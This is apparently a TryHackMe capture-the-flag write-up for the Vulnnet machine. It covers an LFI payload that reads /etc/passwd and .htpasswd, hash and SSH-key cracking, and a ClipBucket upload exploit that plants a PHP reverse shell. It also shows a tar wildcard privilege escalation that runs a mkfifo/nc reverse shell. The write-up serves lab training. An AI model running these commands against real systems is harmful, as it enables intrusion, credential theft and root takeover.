LinkedIn GitHub Twitter

TryHackMe - Vulnnet

TL;DR - Refer #kill-chain

Enumeration

NMAP Scan

JavaScript File analysis - Running GoBuster and Nikto won't give us much information so we decide to analyze JavaScript files

Looking at http://vulnnet.thm/js/index__7ed54732.js, we get the subdomain "broadcast.vulnnet.thm" which we add to /etc/hosts file in KALI.

Looking at other JavaScript, we see link containing PHP parameter "referer" in index.php page - http://vulnnet.thm/js/index__d8338055.js

Please note - this can be automated using https://github.com/GerbenJavado/LinkFinder

broadcast.vulnnet.thm

Visiting home page, we see that it needs Basic Authentication to proceed.

PHP Parameter analysis and gaining Foothold -

All we left is to check PHP parameter and see if there are any vulnerabilities. Normally, PHP parameters can be vulnerable to Local File inclusion (LFI), Remote File Inclusion (RFI), SQL Injection etc. and we decide first to FUZZ test it with LFI.

Using PHP Data Wrappers, we confirm that the index.php is vulnerable to LFI using referer parameter

Payload - referer=php://filter/resource=/etc/passwd

Reference - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md#lfi--rfi-using-wrappers

Since we are looking for Basic Auth creds to login in http://broadcast.vulnnet.thm, we can leverage LFI for this and find password. Good place to look is .htpasswd file in /etc/apache2 folder.

Looking at this, we find credential hash -

Using JohnTheRipper, we can crack the hash using already rocking dictionary.

echo "<hash>" > hash.txt
john hash.txt --wordlist=<wordlist>

ClipBucket App - Login to broadcast.vulnnet.thm

Login to broadcast.vulnnet.thm, we get in and see ClipBucket app -

We also see that ClipBucket is at version 4 and looking in Searchsploit, we see potential exploits to gain foothold -

We will leverage File Upload vulnerability and try to inject PHP reverse shell -

Weaponized payload -

curl -F file=@file.php -F plupload=1 -F name=shell.php 
http://developers:<redacted>@broadcast.vulnnet.thm/actions/beats_uploader.php -X POST

where -
file.php - https://github.com/pentestmonkey/php-reverse-shell

Reference - https://www.exploit-db.com/exploits/44250

Edit reverse shell script - add your VPN IP and listening netcat port

Starting reverse shell on KALI -

rlwrap nc -nlvp 4444

Locating shell code -

http://broadcast.vulnnet.thm/actions/CB_BEATS_UPLOAD_DIR/

Click on our shellcode script and we see reverse shell on Kali -

Privilege Escalation

We see /var/backup/ directory contains backup of valid user "system-management" SSH Key.

Extracting key -

We see the key is encrypted and needs passphrase so we will crack the key using JohnTheRipper

In order to crack, we will need to convert key to "JohnTheRipper" format using ssh2john utility which can be found on Github - 

	python ssh2john.py private_key > private_key_john_format
	john private_key_john_format --wordlist=rockyou.txt

We get the password and now we will convert RSA key to PEM format using OpenSSL -

openssl rsa -in private_key -text  private_key.pem

<Enter password when asked>

#then secure the permissions on "private_key.pem" using following command -

chmod 0600 private_key.pem

SSH as "system-management" user with the new key -

ssh -i private_key.pem server-management@vulnnet.thm

We get in and see user.txtin home folder as our first flag.

Cron Job -

We see the backup files were executed as Cron job running as user root.

cat /etc/cron*

Looking at the backup script, we see it is backing up all files (wildcard) from /home/server-management/Documents directory using tar utility.

We will leverage this functionality to our advantage -

Using GTFO Bins, we see that tarcan run script when we specify --checkpoint flag. Creating such files in Linux can help us gain the root.

https://gtfobins.github.io/gtfobins/tar/#shell

Creating reverse shell script -

	cd /home/server-management/Documents
	echo "mkfifo /tmp/pe; nc <VPN IP> 5555 0</tmp/pe| /bin/sh >/tmp/pe2>&1; rm /tmp/pe" > shell.sh

Creating dummy files that can act as command line arguments to tar -

	echo "" > "--checkpoint-action=exec=sh shell.sh"
	echo "" > --checkpoint=1

Since the --checkpoint is not a valid Linux file, tar will treat those files as part of command arguments and execute reverse shell.

Effective commands will be -

tar czf <file1> <file2> <file3> --checkpoint=1 --checkpoint-action=exec sh shell.sh

Starting netcat lister on kali - rlwrap nc -nvlp 5555

Getting reverse shell -

Kill Chain

PreviousNatas Level 8 -> Level 9NextHTB - ScriptKiddie

Last updated